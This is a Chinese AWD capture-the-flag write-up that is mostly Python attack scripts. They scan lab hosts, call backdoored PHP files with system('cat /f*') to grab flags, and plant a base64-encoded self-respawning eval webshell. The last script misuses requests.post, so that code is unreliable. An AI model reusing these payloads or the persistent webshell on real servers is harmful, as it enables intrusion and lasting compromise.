AWD web

9-19awd

AWD 

1

tar -zcvf /app/backup.tar.gz .

源码打包,扫c段

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

import requests
from concurrent.futures import ThreadPoolExecutor

def get_ip(url):
    try:
        resp = requests.get(url, timeout=5)
        if resp.status_code == 200:
            # 在URL前后添加双引号
            formatted_url = f'"{url}"'
            with open("host.txt", "a") as f:
                f.write(formatted_url +","+"\n")
            print(formatted_url)
    except requests.RequestException as e:
        pass  # 忽略连接超时等错误

if __name__ == "__main__":
    # 清空或创建host.txt文件
    open("host.txt", "w").close()
    
    # 生成URL列表
    urls = [f"http://192-168-1-{i}.pvp6630.bugku.cn" for i in range(1, 255)]
    
    # 使用线程池并发请求
    with ThreadPoolExecutor(max_workers=100) as executor:
        executor.map(get_ip, urls)

d盾扫一下,发现1.php有后门,直接连

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

import requests

urls = [
"http://192-168-1-35.pvp6630.bugku.cn",
"http://192-168-1-41.pvp6630.bugku.cn",
"http://192-168-1-92.pvp6630.bugku.cn",
"http://192-168-1-83.pvp6630.bugku.cn",
"http://192-168-1-48.pvp6630.bugku.cn",
"http://192-168-1-201.pvp6630.bugku.cn",
"http://192-168-1-188.pvp6630.bugku.cn",
"http://192-168-1-195.pvp6630.bugku.cn",
"http://192-168-1-223.pvp6630.bugku.cn",




]

# 尝试常见的 PHP 后门文件名
possible_paths = [
    "/e/search/result/1.php",
]

for base_url in urls:
    for path in possible_paths:
        url = base_url + path
        try:
            resp = requests.get(url, params={'s': 'system("cat /home/ctf/flag")'})
            print(f"==== {url} ====")
            print(resp.text.strip())
            print()
        except Exception as e:
            print(f"[!] {url} 请求失败: {e}")

发现自己有马,先删了,然后直接连,也拿了几个flag

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

import requests

urls = [
"http://192-168-1-35.pvp6630.bugku.cn",
"http://192-168-1-41.pvp6630.bugku.cn",
"http://192-168-1-92.pvp6630.bugku.cn",
"http://192-168-1-83.pvp6630.bugku.cn",
"http://192-168-1-48.pvp6630.bugku.cn",
"http://192-168-1-201.pvp6630.bugku.cn",
"http://192-168-1-188.pvp6630.bugku.cn",
"http://192-168-1-195.pvp6630.bugku.cn",
"http://192-168-1-223.pvp6630.bugku.cn",




]

# 尝试常见的 PHP 后门文件名
possible_paths = [
    "/getshell.php",
]
data={'1':'system("cat /f*");'}

for base_url in urls:
    for path in possible_paths:
        url = base_url + path
        try:
            resp = requests.post(url, data=data)
            print(f"==== {url} ====")
            print(resp.text.strip())
            print()
        except Exception as e:
            print(f"[!] {url} 请求失败: {e}")

后面发现有人给我靶机删了,恢复一下

1

tar -zxv 9-19.tar

本来想打进不死马,但是不确定打进没,刚想上蚁剑看,马被别人删了

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

import requests

urls = [
"http://192-168-1-35.pvp6630.bugku.cn",
"http://192-168-1-41.pvp6630.bugku.cn",
"http://192-168-1-92.pvp6630.bugku.cn",
"http://192-168-1-83.pvp6630.bugku.cn",
"http://192-168-1-48.pvp6630.bugku.cn",
"http://192-168-1-201.pvp6630.bugku.cn",
"http://192-168-1-188.pvp6630.bugku.cn",
"http://192-168-1-195.pvp6630.bugku.cn",
"http://192-168-1-223.pvp6630.bugku.cn",

]

path = "/e/search/result/1.php"  # POST 数据
basecode='Cjw/cGhwCiAgICBpZ25vcmVfdXNlcl9hYm9ydCh0cnVlKTsKICAgIHNldF90aW1lX2xpbWl0KDApOwogICAgdW5saW5rKF9fRklMRV9fKTsKICAgICRmaWxlID0gJzEucGhwJzsKICAgICRjb2RlID0gJzw/cGhwIGlmKG1kNSgkX0dFVFsicGFzcyJdKT09IjgyNWY2Y2Q5NTVhOWVmNTI0ZTk3NjQxZjlmN2E2ODRhIil7QGV2YWwoJF9QT1NUWzFdKTt9ID8+JzsKICAgIHdoaWxlICgxKXsKICAgICAgICBmaWxlX3B1dF9jb250ZW50cygkZmlsZSwkY29kZSk7CiAgICAgICAgc3lzdGVtKCd0b3VjaCAtbSAtZCAiMjAxOC0xMi0wMSAwOToxMDoxMiIgLiRmaWxlJyk7CiAgICAgICAgc3lzdGVtKCJjaG1vZCA3NzcgIiAuJGZpbGUpOwogICAgICAgIHVzbGVlcCg1MDAwKTsKICAgIH0KCj8+'

params = {
    "s": '''system("cat /f*");file_put_contents("./sh.php",base64_decode("{}"));system("chmod 777 ./sh.php");'''.format(basecode)
}

# 遍历所有 URL
for base_url in urls:
    url = base_url + path
    try:
        resp = requests.get(url,  params=params)
        print(f"==== {url} ====")
        print(resp.text.strip())
        print()
    except Exception as e:
        print(f"[!] {url} 请求失败: {e}")

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

import requests

urls = [
"http://192-168-1-35.pvp6630.bugku.cn",
"http://192-168-1-41.pvp6630.bugku.cn",
"http://192-168-1-92.pvp6630.bugku.cn",
"http://192-168-1-83.pvp6630.bugku.cn",
"http://192-168-1-48.pvp6630.bugku.cn",
"http://192-168-1-201.pvp6630.bugku.cn",
"http://192-168-1-188.pvp6630.bugku.cn",
"http://192-168-1-195.pvp6630.bugku.cn",
"http://192-168-1-223.pvp6630.bugku.cn",

]

# 尝试常见的 PHP 后门文件名
possible_paths = [
    "/.l.php",
]
params={'pass':'fxznb666'}
for base_url in urls:
    for path in possible_paths:
        url = base_url + path
        try:
            resp = requests.post(url, post={'1': 'system("cat /home/ctf/flag")'},params=params)
            print(f"==== {url} ====")
            print(resp.text.strip())
            print()
        except Exception as e:
            print(f"[!] {url} 请求失败: {e}")
Emo
谢谢观看